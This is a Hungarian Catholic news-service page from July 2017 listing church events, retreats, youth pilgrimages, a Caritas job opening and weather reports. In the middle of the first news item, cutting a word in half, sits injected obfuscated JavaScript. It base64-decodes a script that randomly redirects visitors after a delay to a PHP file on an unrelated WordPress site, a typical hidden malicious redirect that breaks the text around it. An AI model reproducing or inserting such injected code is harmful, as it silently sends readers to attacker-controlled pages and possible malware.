2017. július 10. – Hírek és programajánló

H Í R E K   E S T E

Elkezdődött a vallástanári továbbképző
A Romániai Magyar Pedagógusok Szövetsége 25 éve szervezi meg a Kárpát-medence legnagyobb magyar pedagógusfórumát, a Bolyai Nyári Akadémiát. Az idei, július 10–14-ig tartó találkozó témája: „Legyen játék a tanulás! – Hatékony módszerek a hitre nevelés szolgálatában.”
A hittanári továbbképző helyszínválasztását elsődlegesen az idén ünnepelt Szent László Év motiválta. Ilyen módon szinte minden program középpontjában a szent király áll.
A programsort püspöki szentmise nyitotta, és minden nap rövid közös imával kezdődik. A heti programsor közepén egy, a szentéletű lovagkirályhoz kapcsolódó zarándoklaton vesznek részt a pedagógusok, ami a vártemplomban bemutatfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szentmisével zárul. A Szent László egykori temetkezési helyét őrző váradi vár interaktív bemutatásán túl a nagyváradi püspöki székesegyháznak és kincstárának, valamint a püspöki palotának a közelebbi megismerésére is lehetőség lesz. A programpontok között táncház, filmklub, közös szórakozási-sportolási lehetőség és vezetett városnézés is szerepel. A nagyváradi továbbképző házigazdája Böcskei László megyéspüspök-tudosított Micaci Cristian pasztorális referens.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán a kosteleki templomban tartják az örökös szentségimádási napot. Szemléljük, engeszteljük és imádjuk Krisztust, a legméltóságosabb Oltáriszentségben!

Virrasztás a Székesegyházban
A Boldogságos Szűz Mária fatimai jelenésének emlékére július 12-én, szerdán este hét órakor szentségimádást, kilenc órakor szentmisét tartanak a nagyváradi római katolikus székesegyházban, majd tíz órakor gyertyás körmenetet tartanak a Püspöki Palota kertjében. A szentmise főcelebránsa és szónoka Láber Ferenc nagyvárad-őssi plébános.

Állásajánlat Sepsibükszádon
A Gyulafehérvári Caritas Szociomedikális Ágazata idősgondozót alkalmaz Sepsibükszádra. Az otthoni ápolással és szociális gondozással a Caritas célja az egészségügyi alapápolás biztosítása, az egészségi állapot megtartása, helyreállítása, illetve javítása az ágyhoz, házhoz kötött idős, beteg emberek számára. A leendő munkatárs feladatai: az ápolás kivitelezése, a teljes ápolási dokumentáció elkészítése, adminisztratív feladatokban való részvétel, mozgásérzékelés képzéseken való részvétel, a szerzett tudás felhasználása a mindennapi ápolási tevékenységek során, az ellátott személyek mozgásfejlesztése érdekében. A jelölttel szemben támasztott elvárások: érettségi és szakápolói oklevél, szabadgyakorlási engedély, a szakápolás mellett vállalja az alapápolást is, csapatmunkára való készség, rugalmas munkamegosztásra való készség, fejlett szociális érzék, pontosság, keresztény értékrend, kommunikációs készség, a magyar és román nyelv ismerete és használata, B. kategóriás jogosítvány. A jelentkezéshez szükséges iratok listáját, ill. bővebb információt a www.caritas-ab.ro/hu/allashirdetesek oldalon találják. A kiválasztott személyeket telefonon értesítik az interjú időpontjáról, július 16-ig.

Időjárás: Holnap is marad a kánikula, a csúcshőmérséklet 30-37 fok körül tetőzhet, de néhol akár a 39 fokot is elérheti. Nyugaton és délnyugaton lesz a legmelegebb. A hőséget szórványosan kialakuló záporok, zivatarok enyhítik majd. Élénk, erős lesz a szél. 

MRE - Hírszolgálat, 2017. július 10.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai napon a Hunyad megyei Zámban tartják az örökös szentségimádási napot. Szemléljük, engeszteljük és imádjuk Krisztust, a legméltóságosabb Oltáriszentségben!

FerBiT 2017
10. alkalommal kerül megszervezésre a Ferences Biciklitúra július 19-24. között. Ezelőtt tíz évvel indult el útjára ez a közösségformáló program, évről-évre nemcsak a csapat erősödött, hanem egy lelkes biciklis közösség is kialakult. Érdeklődni és jelentkezni még a mai napon lehet a 0741-940171-es telefonszámon vagy a biciklistak@gmail.com e-mail címen, illetve a www.ferbit.ro honlapon. Várnak minden érdeklődőt.

Kolping-családos hétvége Ivóban
Július 14–16. között Kolping-családos hétvége lesz Ivóban, amelyet Bereczki Silvia segítő nővér kísér. A gyermekeknek felügyeletet biztosítanak. A résztvevőket július 14-én, pénteken délután hat óráig várják, a távozás vasárnap, július  16-án lesz a közös ebéd után. Az részvételi díj egy család részére 50 lej. Jelentkezni és érdeklődni Tánczos Editnél lehet a tanczosedit@kolping.ro e-mail-címen, vagy a 0748.167.464-es telefonszámon. A jelenkezéseket a helyek függvényében és a jelentkezés sorrendjében július 12-ig fogadják.

Lelkigyakorlat Hargitafürdőn
Dr. Gál Péter tart lelkigyakorlatot július 14–16. között a hargitafürdői kápolnában. A tanítások arról szólnak, hogy mi mindentől és hogyan is váltott meg minket az Úr Jézus? Honnan van a rossz, a szenvedés? Jó és rossz hatások megkülönböztetése a keresztény életben. Mit jelent valóban keresztény életet élni: Jézussal szenvedek, Jézussal gyógyulok. Jézus az én személyes szabadítóm és orvosom. Szentmisékben, szentségimádásokban kérik az Úr Jézustól az ősök bűnterheitől való szabadulást, az egyéni emlékezet gyógyítását, a félelmek feletti győzelmet. Érdeklődni és jelentkezni Bartis Lászlónál lehet a 0744.145.331-es telefonszámon.

Felvételi a BBTE Római Katolikus Teológia Karára
A kolozsvári Római Katolikus Teológia Kar felvételit hirdet július 19 és 31. között alap- és magiszteri képzésre egyaránt. A kar bentlakást és évi 2500 lej ösztöndíjat biztosít minden olyan Kolozsváron tanulni vágyó katolikus fiatalnak, aki a Babeș–Bolyai Tudományegyetem bármilyen szakára jelentkezik a Római Katolikus Teológia Karra való beiratkozása mellett. A kar célkitűzése katolikus értelmiség formálása. A teológia oktatásával szeretnék hitükben megerősíteni hallgatóikat, és számukra olyan erkölcsi alapot nyújtani, amely a boldogságkeresés útján szilárd útmutatót jelent. Részletek a www.rocateo.ro honlapon.

Kalotaszegi tánctanítás önismereti elemekkel
Július 21-23. között Csíkszentdomokoson, a Szent Margit Lelkigyakorlatos Házban kalotaszegi tánctanítás lesz önismereti elemekkel: kalotaszegi néptánc tanítás kezdő szinten, személyes idő és megosztás arról, hogy ki hogyan éli meg nőiességét, illetve férfiasságát, non-verbális kommunikáció, a vezetni és vezetve témakör tapasztalati elmélyítése, rövid önismereti impulzusok az élet kisebb-nagyobb döntéseinek megkönnyítéséhez. Célja: a kultúra és a lelkiség közös megélése egy hétvégén.  Jelentkezni Darvas Piroska segítőnővérnél lehet a darvas.piroska@yahoo.com e-mail címen lehet.

Márton Áron Imatúra
Idén július 22-30. között tartják a Márton Áron Imatúrát, amelyet jezsuiták, ignáci lelkiségű nővérek és laikusok,  valamint a szentegyházasfalvi „Szent Gellért Alapítvány” szervez magyar fiatalok számára, 1995. óta minden évben. Érdeklődni lehet a maimatura@gmail.com, illetve jakabos.barnabas@jezsuita.hu e-mail címen, vagy a 0755-533101 telefonszámon. Jelentkezési határidő: július 15. Kizárólag a fent említett e-mail címen lehet beregisztrálni az imatúrára. A résztvevők száma korlátozott.  

FerIZa 2017
15. alkalommal rendezik meg idén a Ferences Ifjúsági Zarándoklatot, a FerIZát július 28-augusztus 2. között. Ez a program alkalom arra, hogy a természetben egy kicsit közelebb kerüljön a résztvevő a Jóistenhez, társaihoz, és nem utolsósorban saját magához. Várják a 16-35 év közötti fiatalok jelentkezését egészen július 20-ig a 0748-193371-es telefonszámon Szabolcs testvérnél, vagy a ferencesprogramok33@gmail.com címen.

CSIT 2017
Augusztus 15-19. között kerül megrendezésre az idei Csíksomlyói ifjúsági találkozó „Ébredj, és Lépj” mottóval. Egy lendületes, meglepetésekkel, újításokkal tele találkozó, ahol Isten Szentlelke felébreszt az unalmas hétköznapokból. Idén tehetsz egy (vagy akár több) lépést, hogy egy hiteles, életvidám, keresztény fiatallá válj. Ő ma is él, felébreszt és tettekre hív! Tedd meg az első lépést, jelentkezz! Aki július 20-a előtt bejelentkezik és kifizeti az előleget az ajándék    pólóban részesül. Részletek a csitinfo.ro honlapon.

Időjárás: Ma a napos idő mellett erőteljes lesz a gomolyfelhő-képződés, leginkább északnyugaton és északon alakulhat ki egy-egy lokális zápor, zivatar, de nagy mennyiségű csapadékra sehol nem kell számítani. Élénk, erős lesz a déli-délnyugati szél. A maximumok 30 és 37 fok között alakulnak.

MRE - Hírszolgálat, 2017. július 10.

About the author

maradmin

Leave a Comment